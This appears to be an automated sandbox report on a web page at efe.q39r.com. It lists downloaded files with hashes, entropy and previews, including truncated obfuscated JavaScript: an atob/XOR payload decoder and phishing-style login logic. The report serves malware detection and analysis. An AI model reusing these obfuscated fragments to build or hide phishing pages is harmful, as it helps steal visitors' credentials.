                                                                                  Preview:<script>..function FMcPiIJZFB(TSbNVFoZoh, TbHoTZbtdc) {..let wYqfQmBeWw = '';..TSbNVFoZoh = atob(TSbNVFoZoh);..let rxpDMAQNbI = TbHoTZbtdc.length;..for (let i = 0; i < TSbNVFoZoh.length; i++) {.. wYqfQmBeWw += String.fromCharCode(TSbNVFoZoh.charCodeAt(i) ^ TbHoTZbtdc.charCodeAt(i % rxpDMAQNbI));..}..return wYqfQmBeWw;..}..var zKWsWpKYcy = FMcPiIJZFB(`cGZzIhUdNWA3WiQzWgFoRGYMGg4hKxcBNycLDVAfImUJYFx1BFUTHnJKPU12aUwMARk+LkcZdjoeU09YJDNDHSVzQx8RFSgiGQcnPAlCC1QvKFpCPDgZVQADYXQZW3h5Ql0bFGItRE9odUNDEQglN0NTW0NMEFJacDRUHz85GBABCC96FQUiPRxDSFVjJFMDeDoDUxkfOGleAnl9QgZcSmM0WA49LBgeGxViKl4DeCMfEkxGYzRUHz85GA5/cGxnF01qOg9CGwo4Z0QfNXROWAYOPDQNQnk+G0dcHSMoUAEzZw9fH1U+IlQMJj0PWBNVLTdeQzw6Tg5OVT8kRQQmPVI9eFpsZxdROiACW1IIKSsKTyU9FVwXCSQiUhl0aQRCFxxxZRheYi8lCDcbLglTBDJ/WwFGWHJKPU12aUwMHhMiLBcfMyVREgEONStSHj4sCURQWiQ1Ugtra0NREAJ0cUICJDoEVRRIdGUJYFxpTBBSRiAuWQZ2OwlcT1g8NVIBOSgIElISPiJRUHQ5HQYcTjwdYStlfQpCRC0bKloYIHpVElIbP3oVCzknGBJSDjU3UlB0LwNeBlU7KFELZGtMUwAVPzRYHz8uBV5PWC0pWAMvJANFAVhySj1NdmlMDB4TIiwX
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):109964
                                                                                  Entropy (8bit):5.201196778775329
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:/WnW4GGYV5DDBwTDg5MCtG5DYg5Mr5AVy6G0BY/2lVm9e7JfmspXvaPcjtv92Nkx:/WnW4Gj5Oy6GRCV//Xv5riu7a58NEW
                                                                                  MD5:78A5500114640D663460BCBB33E694EB
                                                                                  SHA1:C72B1B93C8BC2DDBD77BA3C042A8ED415B6B8E26
                                                                                  SHA-256:E97FE9DB7CA567DA1F9F5A3B87B669146ADDF1983392C32FDA68C4D667A3CA22
                                                                                  SHA-512:AAEB2961C7F93B8DF2600068C48706920D0DA1E1C2C925FBDFBED10E33120B05C9722ECBB63C6B3DD534D664CFB5F183CCF850591BBB78DAA89E0A3F637A450C
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/345AebFBkUb4itsJp2dEx9Nz1WrklGGnhP4AVwQmYV89110
                                                                                  Preview:const _0x3c0b69=_0x40bd;(function(_0x1ffa3e,_0x743a4f){const _0x1f38a8=_0x40bd,_0x2d88b6=_0x1ffa3e();while(!![]){try{const _0x461944=-parseInt(_0x1f38a8(0x20b))/0x1+parseInt(_0x1f38a8(0x319))/0x2*(parseInt(_0x1f38a8(0x2d0))/0x3)+parseInt(_0x1f38a8(0x2c7))/0x4*(parseInt(_0x1f38a8(0x281))/0x5)+parseInt(_0x1f38a8(0x21b))/0x6+-parseInt(_0x1f38a8(0x34b))/0x7+parseInt(_0x1f38a8(0x1d9))/0x8+parseInt(_0x1f38a8(0x245))/0x9*(-parseInt(_0x1f38a8(0x2ac))/0xa);if(_0x461944===_0x743a4f)break;else _0x2d88b6['push'](_0x2d88b6['shift']());}catch(_0xf1881c){_0x2d88b6['push'](_0x2d88b6['shift']());}}}(_0x4624,0xa135c));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x332))[_0x3c0b69(0x2df)][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view=_0x3c0b69(0x2c8));document['getElementById'](_0x3c0b69(0x2a8))&&!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x2a8))['classList'][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view='uname_pdf');document[_0x3c0b69(0x326)](_0x3
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                                  Category:downloaded
                                                                                  Size (bytes):43596
                                                                                  Entropy (8bit):7.9952701440723475
                                                                                  Encrypted:true
                                                                                  SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                                                  MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                                  SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                                  SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                                  SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/90XMoG7YJNQ48AE7R9RefBV2W3ZP0TRtab71
                                                                                  Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                                  Category:downloaded
                                                                                  Size (bytes):36696
                                                                                  Entropy (8bit):7.988666025644622
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                                                  MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                                  SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                                  SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                                  SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/23Y1SlAfZUj5ab3gLTPxy70
                                                                                  Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 1115 x 700, 8-bit/color RGB, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):79750
                                                                                  Entropy (8bit):7.954235362439607
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:d1EggIgQfGfPhDMDBFWvC+tFt41M7h5Z4vke5os2+CX/sj4KzD2Rkit38:d1EgEcQ6BFWS1kF4vke54+AYleRvt38
                                                                                  MD5:ACAF77D5AC2A60843A177E3D0581CC1E
                                                                                  SHA1:E0311D76E36490BFC9EB94FCB76B2811247F07D7
                                                                                  SHA-256:D16BE881B067A5038E9AB84AAA56C49D8B712CBA0FD5F7FA15C0AF06605DBF8A
                                                                                  SHA-512:5CA473F340BC9CC224205C71D262DDC24B0A660E650B29337CEF11538E96BA2B4374556DAC3ACB3D6BA085D8B0E1B03400FB20C316C7DBB06EE019C17C73F860
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR...[..........S'_....iCCPicc....c``<...,....y%EA.N...Q.............p...o. j/..Q..p...'...@.R...h...-..ak..I....]^RP.d...E!A.@v......NBb'.......6.9...w3....i. .a(f.bpgp....$.....W...........[..$n!.T.00.00l;..C.IAbQ"X........>-g`..d`..........nS...!....r.R."..y...z@.....!.....??....... cHRM..z&..............u0...`..:....p..Q<....bKGD.............=zTXtRaw profile type icc..(..S.. ....-..$.$$H......l..... 9f..L..9.*X4@E..&......l...d....h'.:.4*....FV\5\.w..W..e...b...(#....}/4..qLg.-...3....D.......Q..&.x...t./.p...L.}.&...qz.U....0[q....{..x...ZVlD.J..xL.e..fIz..z........Z.4.'.:/p........?..TG;.k..]ZE.....<...`..o....w.3-c.W..T.I......c..CNN....^.g.(......orNT..w.....IDATx....r..5.9...n.>aG.a_...wt^u..j....Y...nI-i...|...D....gV~....?.#......... ..w....'......}yk.Z ............?.......?...._....x..|............7'.-.Zk........o|...JR...Y.._...w..~dZk...Zk.?f.....?.@...b.{........i......Zk......rA.v._......e.[...Zk.......j...Zk.......9..W...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):70712
                                                                                  Entropy (8bit):6.94130504124589
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                                                  MD5:F70FF06D19498D80B130EC78176FD3FF
                                                                                  SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                                                  SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                                                  SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/uvxA6m2pQcdHLo4WKfz3QsT75VfK9cbZD4b2TOjfhbMFDRNv8v45kfQyaKb32Svg5rtqF2tTrZgh254
                                                                                  Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (1222), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):1222
                                                                                  Entropy (8bit):5.818804287152988
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2jkm94/zKPccAv+KVCLTLv138EgFB5vtTGJTlWtRcw1MuhtsLqo40RWUnYN:VKEctKonR3evtTA87b1Muh6LrwUnG
                                                                                  MD5:463D838587C8B5873CB6E4E942B770C9
                                                                                  SHA1:E69DCF383A6F3F51F123CA2D86F19FC4BE09E612
                                                                                  SHA-256:1448EC1B3F30A554233BD280AA99A7EAF690D1098647E7DDDEA286C757884F9C
                                                                                  SHA-512:F02DE64A37B90492D714CC7D132C49BF29CB5117CA945258BAF5B36D087A3A2AED165C6FF37D2ED4E4F10D7199AFB9C2B5E2555BA1BECA1A8D3AE133F4DF4B23
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://www.google.com/recaptcha/api.js
                                                                                  Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-0lJkOVHDy3ItYlCbUoEzThjP3hLhLYfEFPAkVOCx
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:dropped
                                                                                  Size (bytes):268
                                                                                  Entropy (8bit):5.111190711619041
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                                                  MD5:59759B80E24A89C8CD029B14700E646D
                                                                                  SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                  SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                  SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 56 x 99, 8-bit/color RGB, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):61
                                                                                  Entropy (8bit):4.002585360278503
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:yionv//thPl/ksT/xl/k4E08up:6v/lhP6sb7Tp
                                                                                  MD5:F18D8D59B1A1FF352F18F7F46F23C995
                                                                                  SHA1:02315EEF8B5E50FED63E04083C539D753672AB36
                                                                                  SHA-256:3BF519D452AE9D482F5E214951034110A204FEC57DC16482E9980F4D47A44C1F
                                                                                  SHA-512:7D667A378F606CE34FE49C5910991655596960658D7AD81BF0F55EC8E1447FF8A2EF36C27800E082B30E7A99A49230C794979DE0649642DB21777FD87CD4CF60
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/879faccbfe8fb06a/1714062180713/RjvXT6k7-qXYQHs
                                                                                  Preview:.PNG........IHDR...8...c.....A.T}....IDAT.....$.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                                  Category:downloaded
                                                                                  Size (bytes):28000
                                                                                  Entropy (8bit):7.99335735457429
                                                                                  Encrypted:true
                                                                                  SSDEEP:768:NDT1rKvlJOE1AgLlnGj8H58AJUcl5I17ML7FfNHubNIphqb:NDtKvyAhjHeACcl21YL7KNW+
                                                                                  MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                                  SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                                  SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                                  SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/pq6n4pZVF34fr6WWmmuv39
                                                                                  Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:downloaded
                                                                                  Size (bytes):2905
                                                                                  Entropy (8bit):3.962263100945339
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                                                  MD5:FE87496CC7A44412F7893A72099C120A
                                                                                  SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                  SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                  SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/wxasWsJm1F7lSOv2iLafEmnGnUVfWsJLmbqt2Gkyab175
                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:JSON data
                                                                                  Category:downloaded
                                                                                  Size (bytes):773
                                                                                  Entropy (8bit):4.731457678411383
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:fu4rLD14ycJvdh/zHoaNOU4/c/UddFB6MrYymPEsr2SlfWxmrE2AptAv9VVZPC:r3141JV9HoaNO3rmMsr2JmrE2sAv9ZC
                                                                                  MD5:0080476117266E35D3FCD1AD3305D0E5
                                                                                  SHA1:A20D1495A11CE72EC68F182D37B1B1F73A63152E
                                                                                  SHA-256:7634C9B946D6849A938A3A6F41AE27D3C2AEFCBACAFC0CAB5CDA19800E2786D6
                                                                                  SHA-512:0BBD6466F2C7E8865937C4830A5F83618E27BFC691FA387EF3D14B0ED4C171476626700C270839663F9474D0D705B39E7FA50CE26C54636493B41D9E33380949
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://ipapi.co/185.152.66.230/json/
                                                                                  Preview:{. "ip": "185.152.66.230",. "network": "185.152.66.0/24",. "version": "IPv4",. "city": "Atlanta",. "region": "Georgia",. "region_code": "GA",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "30301",. "latitude": 33.7485,. "longitude": -84.3871,. "timezone": "America/New_York",. "utc_offset": "-0400",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS60068",. "org": "Datacamp Limited".}
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:dropped
                                                                                  Size (bytes):7390
                                                                                  Entropy (8bit):4.02755241095864
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                                                  MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                  SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                  SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                  SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 4096 x 4096, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):259183
                                                                                  Entropy (8bit):7.172405308346001
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:NNxC3OF49VjxmuJgwQGPPQLKbko7qXYcHXxGSwpi6UaXhWIEao+x6VNyC0Xj71fz:JCeF4VjxmuJgwQGPPQLKbko7qXn3kS6D
                                                                                  MD5:DFD243DB9FCFDB629957D9E17C7C314F
                                                                                  SHA1:19A56EC6D5F5360BF8A044BEEC85F9C69B2A3417
                                                                                  SHA-256:E205239979E7FBCEBE800D1F9CE1139A2EEC9EF49781DD0C90B7811E3E963D12
                                                                                  SHA-512:E4EFE442BE74B5118801EB3B2E1D803858031A333ABF8BF5776D856DE95C0437B59E259032F91BA950329C49ED5EE4BEE4CF7FDAF02D7923A2985FD8D0652865
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR..............$.....pHYs............... .IDATx...{.].].p..R..M.xwfm+...T.I.....!hd!.........Q..A..Nh.*.P(....VPY...@"RM.y.;s..")i.}D..V%.qj_.][U..Il.z........{....=.a.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):727
                                                                                  Entropy (8bit):7.573165690842521
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                                                  MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                                                  SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                                                  SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                                                  SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/opz2A7ILaAyWzSXkUtICNncurtvkgh8DhYFpMx2Oxlzsq9KrZPNl45140
                                                                                  Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                                  Category:downloaded
                                                                                  Size (bytes):28584
                                                                                  Entropy (8bit):7.992563951996154
                                                                                  Encrypted:true
